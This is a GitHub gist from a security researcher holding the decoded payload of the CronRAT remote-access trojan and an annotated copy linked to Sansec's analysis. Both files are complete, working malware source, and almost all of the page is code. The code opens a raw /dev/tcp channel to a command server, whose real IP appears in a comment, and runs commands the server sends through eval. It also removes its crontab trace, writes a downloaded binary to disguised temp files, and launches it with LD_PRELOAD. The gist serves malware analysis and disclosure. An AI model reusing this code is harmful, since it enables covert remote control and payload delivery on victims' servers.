Skip to content

Instantly share code, notes, and snippets.

@gwillem

gwillem/_cronrat.sh

Last active July 11, 2022 14:04
Show Gist options
  • Star 18 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save gwillem/fbe3e6b98e2e10d7f1f271ca4b6e813f to your computer and use it in GitHub Desktop.
Save gwillem/fbe3e6b98e2e10d7f1f271ca4b6e813f to your computer and use it in GitHub Desktop.
Download ZIP
This is the decoded payload from the CRON loader. Full analysis here: https://sansec.io/research/cronrat
Raw
_cronrat.sh
set -eEu
set -o pipefail
trap 'echo "L$LINENO"; O70; exit -1' ERR
O54=4
function O70()
{
if [[ ! -z "${O57+x}" ]]; then
if [[ -f "${O57}" ]]; then
rm -f "${O57}"
fi
fi
}
function O85()
{
echo "F${1}"
O70
exit ${1}
}
function O73()
{
if [[ "$(type ${1} &> /dev/null; echo ${?})" == 0 ]]; then
echo 1
else
echo 0
fi
}
function O63()
{
O27=$(command -v "${1}")
if [[ -u "${O27}" || -g "${O27}" ]]; then
echo 1
else
echo 0
fi
}
if [[ $(O73 "") == 0 ]]; then
O85 8
fi
if [[ $(O63 "") == 1 ]]; then
O85 10
fi
if [[ $(O73 "printf") == 0 || $(O73 "ps") == 0 || $(O73 "od") == 0 || $(O73 "seq") == 0 || $(O73 "dd") == 0 || $(O73 "awk") == 0 ]]; then
O85 6
fi
if [[ $(O73 "crontab") == 0 ]]; then
O85 9
fi
O15=1
O18=2
O12=3
O19=4
O16=5
O13=6
O7=7
O1=10
O10=$(printf '9%.0s' $(seq 1 ${O1}))
O9=3
O36=('/dev/shm;www-shared|server-worker-shared|sql-shared|php-shared' "/run/user/$(id -u);systemd-user.lock|php.lock|php-fpm.lock|www-server.lock" "/tmp;php_sess_$RANDOM$RANDOM$RANDOM|zend_cache__$RANDOM$RANDOM$RANDOM" '/var/tmp;php_cache|www_cache|worker_cahce' "$(pwd);logo_edited_$(date +'%N').png|user_edited_$(date +'%N').jpg|user_edited_$(date +'%N').css|custom_edited_$(date +'%N').css")
O25=0
O17=1
O5=2
function O72()
{
local new_cron=""
local O46=false
while read O39; do
if [[ "${O39:0:13}" != "53 23 31 2 3 " ]]; then
new_cron+="${O39}\n"
else
O46=true
fi
done <<< "$(crontab -l 2>/dev/null)"
if [[ "${O46}" == false ]]; then
echo -n ${O17}
return
fi
echo -e "${new_cron%??}" | crontab - &>/dev/null
if [[ $? != 0 ]]; then
echo -n ${O5}
return
fi
echo -n ${O25}
}
function O71()
{
echo $(( $(awk '{printf "%0.f", $1}' < /proc/uptime) + 1 ))
}
function O65()
{
local today="$(date +'%F')"
local now=$(date +'%s')
local midnight=$(date -d "${today} 0" +%s)
echo "$((${now} - ${midnight}))"
}
O23=$(( $(O71) / (30 * 60) ))
O3=$(( ($(O65) / 60) % 120 ))
if [[ ${O23} -ne 1 ]]; then
if [[ ${O3} -ne 0 ]]; then
O85 0
fi
fi
function O81()
{
echo -n "${1:-$(</dev/stdin)}" | od -An -vtx1 | tr -d ' \n'
}
function O76()
{
echo -n "${1:-$(</dev/stdin)}" | LC_ALL=C awk '{for (i = 1; i <= NF; i++) printf "%c", $i}'
}
function O84()
{
if [[ $(O73 "/bin/lsof") == 0 && $(O73 "/sbin/lsof") == 0 && $(O73 "/bin/fuser") == 0 && $(O73 "/sbin/fuser") == 0 ]]; then
echo -1
fi
local O41=-1
if [[ $(O73 "/bin/lsof") == 1 ]]; then
O41=$(/bin/lsof -t "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
elif [[ $(O73 "/sbin/lsof") == 1 ]]; then
O41=$(/sbin/lsof -t "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
elif [[ $(O73 "/bin/fuser") == 1 ]]; then
O41=$(/bin/fuser "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
O41=$(echo ${O41} | awk '{$1=$1};1')
elif [[ $(O73 "/sbin/fuser") == 1 ]]; then
O41=$(/sbin/fuser "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
O41=$(echo ${O41} | awk '{$1=$1};1')
fi
echo "${O41}" | awk -F' ' '{print $NF}'
}
function O75()
{
"$@" 0>&- 1>&- 2>&- 3>&- 4>&- 5>&- 6>&- 7>&- 8>&- 9>&-
}
function O74()
{
set +eE
local O41=-1
for O61 in {1..1024}; do
local _o_="$(true 2>/dev/null >&${O61}; echo $?)"
local _i_="$(true 2>/dev/null <&${O61}; echo $?)"
if [[ "${_o_}${_i_}" == "11" ]]; then
O41=${O61}
break
fi
done
set -eE
echo ${O41}
}
function O68()
{
set +eE
O41=$(grep -Eq "^[^ ]+ ${1} [^ ]+ ([^ ]*,)?noexec[, ]" /proc/mounts; echo $?)
set -eE
echo ${O41}
}
function O69()
{
set +eE
O41=$(df -P "${1}" 2>/dev/null)
if [[ ${?} -eq 0 ]]; then
O41=$(echo "${O41}" | tail -1)
if [[ "${O41}" == /dev/mapper/* ]]; then
O41=$(echo "${O41}" | tr -s ' ' | cut -d' ' -f6)
else
O41=$(echo "${O41}" | cut -d' ' -f1)
fi
else
O41=1
fi
set -eE
echo ${O41}
}
function O64()
{
local IFS=$"${1}"
read -r -a arr <<< "${2}"
echo "${arr[@]}"
}
function O62()
{
local IFS=$"${1}"
read -r -a arr <<< "${2}"
echo "${arr[${3}]}"
}
function O66()
{
local O41=0
local O50="${1}"
if [[ -L "${O50}" ]]; then
if [[ -e "${O50}" ]]; then
O50=$(realpath "${O50}")
else
echo 0
return
fi
fi
O31=$(O69 "${O50}")
if [[ "${O31}" != "1" ]]; then
if [[ "${O31}" == "tmpfs" ]]; then
O31="${O50}"
fi
if [[ $(O68 "${O31}") -eq 1 ]]; then
if [[ -e "${O50}" && -d "${O50}" && -w "${O50}" ]]; then
O41=1
fi
fi
fi
echo ${O41}
}
O56=$(O74)
if [[ ${O56} -eq -1 ]]; then
O85 1;
fi
O55="-1"
O58="-1"
O57="-1"
for O35 in "${O36[@]}"; do
O28=($(O64 ';' "${O35}"))
O50="${O28[0]}"
if [[ $(O66 "${O50}") -eq 1 ]]; then
O26=($(O64 '|' "${O28[1]}"))
O55="${O50}"
O58="${O26[$RANDOM$RANDOM$RANDOM % ${#O26[@]}]}"
O57="${O55}/${O58}"
break
fi
done
if [[ "${O55}" == "-1" || "${O58}" == "-1" || "${O57}" == "-1" ]]; then
O85 2;
fi
set +eE
eval "exec ${O56}<>/dev/tcp/796077735/$((0x1bb))" &>/dev/null || O85 5
set -eE
eval "head -c "26" <&${O56}" &> /dev/null
function O67()
{
O60=$(dd if=/dev/urandom bs=1 count=1 2>/dev/null)
if [[ -z ${O60} ]]; then
O60='X';
fi
if [[ ${O60} == $'\n' ]]; then
O60='1';
fi
if [[ ${O60} == $'\'' ]]; then
O60='h';
fi
echo $(( 16#$(O81 "${O60}") ))
}
function O79()
{
local O41=""
for ((i=0; i < ${#1}; i++)); do
O51=$((10#$(printf "%d" "'${1:$i:1}")))
O52=$(printf '%02d ' $((${2} ^ ${O51})) )
O41="${O41}${O52}"
done
O76 "${O41}" | base64 -w0 -
}
function O78()
{
local O41=""
O53=$(echo "${1}" | base64 -w0 -d - | od -An -vtx1 | tr -d ' \n')
O32=$(echo "${1}" | base64 -w0 -d - | wc -c)
for ((i=0; i < $(( ${O32} * 2 )); i+=2)); do
O51=$((16#$(printf ${O53:$i:2})))
O52=$(printf \\$(printf '%03o' $((${2} ^ ${O51})) ) )
O41="${O41}${O52}"
done
echo ${O41}
}
function O83()
{
O60=$(O67)
O21=$(O76 "${O60}")
O8=$(O76 "${2}")
O30=$(O79 "${1}" $O60)
O49=${#O30}
if [[ ${O49} -gt ${O10} ]]; then
O85 3;
fi
O44=$(printf "%0${O9}d" ${O54})
O45=$(printf "%0${O1}d" ${O49})
eval "echo -n '${O21}${O8}${O44}${O45}${O30}' >&${O56}"
}
function O80()
{
O20=${1:-false}
O60=$(head -c "1" <&${O56})
O29=$(head -c "1" <&${O56})
O37=$(head -c "${O9}" <&${O56})
O43=$(head -c "${O1}" <&${O56})
O49=$((10#${O43}))
if [[ ${O49} -gt ${O10} ]]; then
O85 4;
fi
O38=$(head -c "${O49}" <&${O56})
O22=$(( 16#$(O81 "${O60}") ))
if [[ ${O20} == true ]]; then
O6="${O38}"
else
O6=$(O78 "${O38}" ${O22})
fi
echo "${O6}"
}
function O82()
{
head -c "${1}" <&${O56} > /dev/null
}
function O77()
{
eval "exec ${O56}>&-"
}
O83 "yG/uPNaConkVC,pSRB&S]mJ4S[@QM[4+V#M9jLQBI\$1\$}G<^(.rrP~C:+Z,5J<T\`" ${O15}
O83 "cio" ${O18}
O83 "1286cf441288ae88cedf8610943a0ed766c0b59efcf1d6039e435856bfeb6174f8170d4a09f5845418d91bef1c3376ddfc9554bcbdfe928ffa1c745d4ae88ca1" ${O18}
O34=$(O80)
if [[ "${O34}" == "sd" ]]; then
set +eE
O59=$(O72)
set -eE
if [[ ${O59} -eq ${O5} || ${O59} -eq ${O17} ]]; then
O83 "SD${O59}" ${O19}
elif [[ ${O59} -eq ${O25} ]]; then
O83 "SD${O25}" ${O7}
echo "SD"
exit 0
else
O83 "SD${O59}" ${O16}
fi
O83 "cex" ${O18}
O85 0
fi
if [[ "${O34}" == "ev" ]]; then
O48=$(O80)
O59=$(eval "${O48}")
if [[ ! -z "${O59}" ]]; then
O83 "${O59}" ${O13}
fi
O83 "cex" ${O18}
O85 0
fi
if [[ ${O34} -eq 0 ]]; then
O85 0
fi
O83 "prm" ${O18}
O83 "1286cf441288ae88cedf8610943a0ed766c0b59efcf1d6039e435856bfeb6174f8170d4a09f5845418d91bef1c3376ddfc9554bcbdfe928ffa1c745d4ae88ca1" ${O18}
O11=$(O80)
O2=$(O62 '|' "${O11}" 0)
O0=$(O62 '|' "${O11}" 1)
O33=$(O62 '|' "${O11}" 2)
O40=$(O62 '|' "${O11}" 3)
O42=$(O62 '|' "${O11}" 4)
O47=$(O62 '|' "${O11}" 5)
if [[ "${O57}" != "${O2}" ]]; then
if [[ $(O66 $(dirname "${O2}")) -eq 1 ]]; then
O57="${O2}"
fi
fi
O83 "dwn" ${O18}
O4=$(O80 true)
echo "${O4}" | base64 -w0 -d - > "${O57}"
set +eE
O24=$(cd "${O33}" && O75 env "${O0}"="${O40}" LD_PRELOAD=${O57} "${O42}" "${O47}" 1>&2 & O84 "${O57}")
set -eE
if [[ ${O24} -ne -1 ]]; then
O14=5
while [[ ${O14} -ne 0 ]]; do
if ps -p ${O24} &> /dev/null; then
true
else
O83 "ser" ${O19}
O85 7
fi
sleep 1
O14=$((${O14} - 1))
done
O83 "ssc" ${O7}
else
O83 "sun" ${O16}
fi
O83 "cex" ${O18}
O77
Raw
cronrat-annotated.sh
#!/bin/bash
# Annotation (C) info@sansec.io 2021
# Analysis here: https://sansec.io/research/cronrat
set -x
set -eEu
set -o pipefail
trap 'echo "L$LINENO"; remove_temp_file; exit -1' ERR
O54=4
function remove_temp_file() {
if [[ ! -z "${writeable_path+x}" ]]; then
if [[ -f "${writeable_path}" ]]; then
# rm -f "${writeable_path}"
echo "not removing path"
fi
fi
}
function exit_with_code() {
echo "F${1}"
# remove_temp_file
exit ${1}
}
function does_func_exist() {
if [[ "$(
type ${1} &>/dev/null
echo ${?}
)" == 0 ]]; then
echo 1
else
echo 0
fi
}
function is_executable_by_user() {
O27=$(command -v "${1}")
if [[ -u "${O27}" || -g "${O27}" ]]; then
echo 1
else
echo 0
fi
}
if [[ $(does_func_exist "") == 0 ]]; then
exit_with_code 8
fi
if [[ $(is_executable_by_user "") == 1 ]]; then
exit_with_code 10
fi
if [[ $(does_func_exist "printf") == 0 || $(does_func_exist "ps") == 0 || $(does_func_exist "od") == 0 || $(does_func_exist "seq") == 0 || $(does_func_exist "dd") == 0 || $(does_func_exist "awk") == 0 ]]; then
exit_with_code 6
fi
if [[ $(does_func_exist "crontab") == 0 ]]; then
exit_with_code 9
fi
O15=1
O18=2
O12=3
O19=4
O16=5
O13=6
O7=7
O1=10
tenGB=9999999999
O9=3
possible_state_files=(
'/dev/shm;www-shared|server-worker-shared|sql-shared|php-shared'
"/run/user/$(id -u);systemd-user.lock|php.lock|php-fpm.lock|www-server.lock"
"/tmp;php_sess_$RANDOM$RANDOM$RANDOM|zend_cache__$RANDOM$RANDOM$RANDOM"
'/var/tmp;php_cache|www_cache|worker_cahce'
"$(pwd);logo_edited_$(date +'%N').png|user_edited_$(date +'%N').jpg|user_edited_$(date +'%N').css|custom_edited_$(date +'%N').css")
O25=0
O17=1
O5=2
function remove_payload_from_crontab() {
local new_cron=""
local O46=false
while read O39; do
if [[ "${O39:0:13}" != "53 23 31 2 3 " ]]; then
new_cron+="${O39}\n"
else
O46=true
fi
done <<<"$(crontab -l 2>/dev/null)"
if [[ "${O46}" == false ]]; then
echo -n ${O17}
return
fi
echo -e "${new_cron%??}" | crontab - &>/dev/null
if [[ $? != 0 ]]; then
echo -n ${O5}
return
fi
echo -n ${O25}
}
function uptime_in_seconds() {
echo $(($(awk '{printf "%0.f", $1}' </proc/uptime) + 1))
}
function sec_since_midnight() {
local today="$(date +'%F')"
local now=$(date +'%s')
local midnight=$(date -d "${today} 0" +%s)
echo "$((${now} - ${midnight}))"
}
uptime_in_half_hours=$(($(uptime_in_seconds) / (30 * 60)))
O3=$((($(sec_since_midnight) / 60) % 120))
# if [[ ${uptime_in_half_hours} -ne 1 ]]; then # second half hour after boot
# if [[ ${O3} -ne 0 ]]; then # is first minute of a 2h block?
# #only run in first half hour after boot?
#exit_with_code 0
# fi
# fi
function to_hex() {
echo -n "${1:-$(</dev/stdin)}" | od -An -vtx1 | tr -d ' \n'
}
function int2ascii() {
echo -n "${1:-$(</dev/stdin)}" | LC_ALL=C awk '{for (i = 1; i <= NF; i++) printf "%c", $i}'
}
function O84() {
if [[ $(does_func_exist "/bin/lsof") == 0 && $(does_func_exist "/sbin/lsof") == 0 && $(does_func_exist "/bin/fuser") == 0 && $(does_func_exist "/sbin/fuser") == 0 ]]; then
echo -1
fi
local O41=-1
if [[ $(does_func_exist "/bin/lsof") == 1 ]]; then
O41=$(/bin/lsof -t "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
elif [[ $(does_func_exist "/sbin/lsof") == 1 ]]; then
O41=$(/sbin/lsof -t "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
elif [[ $(does_func_exist "/bin/fuser") == 1 ]]; then
O41=$(/bin/fuser "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
O41=$(echo ${O41} | awk '{$1=$1};1')
elif [[ $(does_func_exist "/sbin/fuser") == 1 ]]; then
O41=$(/sbin/fuser "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
O41=$(echo ${O41} | awk '{$1=$1};1')
fi
echo "${O41}" | awk -F' ' '{print $NF}'
}
function close_fds() {
"$@" 0>&- 1>&- 2>&- 3>&- 4>&- 5>&- 6>&- 7>&- 8>&- 9>&-
}
function find_available_fd() {
set +eE
local O41=-1
for O61 in {1..1024}; do
local _o_="$(
true 2>/dev/null >&${O61}
echo $?
)"
local _i_="$(
true 2>/dev/null <&${O61}
echo $?
)"
if [[ "${_o_}${_i_}" == "11" ]]; then
O41=${O61}
break
fi
done
set -eE
echo ${O41}
}
function is_mount_noexec() {
set +eE
O41=$(
grep -Eq "^[^ ]+ ${1} [^ ]+ ([^ ]*,)?noexec[, ]" /proc/mounts
echo $?
)
set -eE
echo ${O41}
}
function find_mount_for_path() {
set +eE
O41=$(df -P "${1}" 2>/dev/null)
if [[ ${?} -eq 0 ]]; then
O41=$(echo "${O41}" | tail -1)
if [[ "${O41}" == /dev/mapper/* ]]; then
O41=$(echo "${O41}" | tr -s ' ' | cut -d' ' -f6)
else
O41=$(echo "${O41}" | cut -d' ' -f1)
fi
else
O41=1
fi
set -eE
echo ${O41}
}
function split_tokens() {
local IFS=$"${1}"
# -r : no \ escaping
# -a : assign to arr
read -r -a arr <<<"${2}"
echo "${arr[@]}"
}
function get_xth_token() {
local IFS=$"${1}"
read -r -a arr <<<"${2}"
echo "${arr[${3}]}"
}
function is_path_writable() {
local O41=0
local testpath="${1}"
if [[ -L "${testpath}" ]]; then
if [[ -e "${testpath}" ]]; then
testpath=$(realpath "${testpath}")
else
echo 0
return
fi
fi
O31=$(find_mount_for_path "${testpath}")
if [[ "${O31}" != "1" ]]; then
if [[ "${O31}" == "tmpfs" ]]; then
O31="${testpath}"
fi
if [[ $(is_mount_noexec "${O31}") -eq 1 ]]; then
if [[ -e "${testpath}" && -d "${testpath}" && -w "${testpath}" ]]; then
O41=1
fi
fi
fi
echo ${O41}
}
upstream_fd=$(find_available_fd)
if [[ ${upstream_fd} -eq -1 ]]; then
exit_with_code 1
fi
writable_dir="-1"
writable_file="-1"
writeable_path="-1"
for O35 in "${possible_state_files[@]}"; do
O28=($(split_tokens ';' "${O35}"))
testpath="${O28[0]}"
if [[ $(is_path_writable "${testpath}") -eq 1 ]]; then
O26=($(split_tokens '|' "${O28[1]}"))
writable_dir="${testpath}"
writable_file="${O26[$RANDOM$RANDOM$RANDOM % ${#O26[@]}]}"
writeable_path="${writable_dir}/${writable_file}"
break
fi
done
if [[ "${writable_dir}" == "-1" || "${writable_file}" == "-1" || "${writeable_path}" == "-1" ]]; then
exit_with_code 2
fi
set +eE
# 47.115.46.167 443
eval "exec ${upstream_fd}<>/dev/tcp/127.0.0.1/4444" &>/dev/null || exit_with_code 5
set -eE
eval "head -c "26" <&${upstream_fd}" &>/dev/null
function get_rand_number() {
O60=$(dd if=/dev/urandom bs=1 count=1 2>/dev/null)
if [[ -z ${O60} ]]; then
O60='X'
fi
if [[ ${O60} == $'\n' ]]; then
O60='1'
fi
if [[ ${O60} == $'\'' ]]; then
O60='h'
fi
echo $((16#$(to_hex "${O60}")))
}
function b64encode() {
local O41=""
for ((i = 0; i < ${#1}; i++)); do
hex2dec=$((10#$(printf "%d" "'${1:$i:1}")))
O52=$(printf '%02d ' $((${2} ^ ${hex2dec})))
O41="${O41}${O52}"
done
int2ascii "${O41}" | base64 -w0 -
}
function b64decode() {
local O41=""
in_hex=$(echo "${1}" | base64 -w0 -d - | od -An -vtx1 | tr -d ' \n')
num_chars=$(echo "${1}" | base64 -w0 -d - | wc -c)
for ((i = 0; i < $((${num_chars} * 2)); i += 2)); do
hex2dec=$((16#$(printf ${in_hex:$i:2})))
O52=$(printf \\$(printf '%03o' $((${2} ^ ${hex2dec}))))
O41="${O41}${O52}"
done
echo ${O41}
}
function send_to_upstream() {
O60=$(get_rand_number)
O21=$(int2ascii "${O60}")
O8=$(int2ascii "${2}")
encoded_payload=$(b64encode "${1}" $O60)
O49=${#encoded_payload}
if [[ ${O49} -gt ${tenGB} ]]; then
exit_with_code 3
fi
O44=$(printf "%03d" ${O54})
O45=$(printf "%010d" ${O49})
echo "SS: echo -n '${O21}${O8}${O44}${O45}${encoded_payload}' >&${upstream_fd}"
eval "echo -n '${O21}${O8}${O44}${O45}${encoded_payload}' >&${upstream_fd}"
}
function read_from_upstream() {
O20=${1:-false}
O60=$(head -c "1" <&${upstream_fd})
O29=$(head -c "1" <&${upstream_fd})
O37=$(head -c "3" <&${upstream_fd})
O43=$(head -c "10" <&${upstream_fd})
O49=$((10#${O43}))
if [[ ${O49} -gt ${tenGB} ]]; then
exit_with_code 4
fi
O38=$(head -c "${O49}" <&${upstream_fd})
O22=$((16#$(
to_hex
"${O60}"
)))
if [[ ${O20} == true ]]; then
O6="${O38}"
else
O6=$(b64decode "${O38}" ${O22})
fi
echo "${O6}"
}
function read_xchar_from_upstream() {
head -c "${1}" <&${upstream_fd} >/dev/null
}
function reset_upstream_fd() {
eval "exec ${upstream_fd}>&-"
}
send_to_upstream "yG/uPNaConkVC,pSRB&S]mJ4S[@QM[4+V#M9jLQBI\$1\$}G<^(.rrP~C:+Z,5J<T\`" 1
send_to_upstream "cio" 2
send_to_upstream "1286cf441288ae88cedf8610943a0ed766c0b59efcf1d6039e435856bfeb6174f8170d4a09f5845418d91bef1c3376ddfc9554bcbdfe928ffa1c745d4ae88ca1" 2
O34=$(read_from_upstream)
if [[ "${O34}" == "sd" ]]; then
set +eE
O59=$(remove_payload_from_crontab)
set -eE
if [[ ${O59} -eq ${O5} || ${O59} -eq ${O17} ]]; then
send_to_upstream "SD${O59}" ${O19}
elif [[ ${O59} -eq ${O25} ]]; then
send_to_upstream "SD${O25}" ${O7}
echo "SD"
exit 0
else
send_to_upstream "SD${O59}" ${O16}
fi
send_to_upstream "cex" 2
exit_with_code 0
fi
if [[ "${O34}" == "ev" ]]; then
O48=$(read_from_upstream)
O59=$(eval "${O48}")
if [[ ! -z "${O59}" ]]; then
send_to_upstream "${O59}" ${O13}
fi
send_to_upstream "cex" 2
exit_with_code 0
fi
if [[ ${O34} -eq 0 ]]; then
exit_with_code 0
fi
send_to_upstream "prm" 2
send_to_upstream "1286cf441288ae88cedf8610943a0ed766c0b59efcf1d6039e435856bfeb6174f8170d4a09f5845418d91bef1c3376ddfc9554bcbdfe928ffa1c745d4ae88ca1" 2
O11=$(read_from_upstream)
O2=$(get_xth_token '|' "${O11}" 0)
env_var_name=$(get_xth_token '|' "${O11}" 1)
O33=$(get_xth_token '|' "${O11}" 2)
env_var_value=$(get_xth_token '|' "${O11}" 3)
foreign_cmd=$(get_xth_token '|' "${O11}" 4)
foreign_param=$(get_xth_token '|' "${O11}" 5)
if [[ "${writeable_path}" != "${O2}" ]]; then
if [[ $(is_path_writable $(dirname "${O2}")) -eq 1 ]]; then
writeable_path="${O2}"
fi
fi
send_to_upstream "dwn" 2
O4=$(read_from_upstream true)
echo "${O4}" | base64 -w0 -d - >"${writeable_path}"
set +eE
O24=$(
cd "${O33}" && close_fds env "${env_var_name}"="${env_var_value}" LD_PRELOAD=${writeable_path} "${foreign_cmd}" "${foreign_param}" 1>&2 &
O84 "${writeable_path}"
)
set -eE
if [[ ${O24} -ne -1 ]]; then
O14=5
while [[ ${O14} -ne 0 ]]; do
if ps -p ${O24} &>/dev/null; then
true
else
send_to_upstream "ser" ${O19}
exit_with_code 7
fi
sleep 1
O14=$((${O14} - 1))
done
send_to_upstream "ssc" ${O7}
else
send_to_upstream "sun" ${O16}
fi
send_to_upstream "cex" 2
reset_upstream_fd
@rickhenderson
Copy link

Nice work gang!

@df2k2
Copy link

df2k2 commented Dec 9, 2021

Brilliant

@jeffersoncechinel
Copy link

well done!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment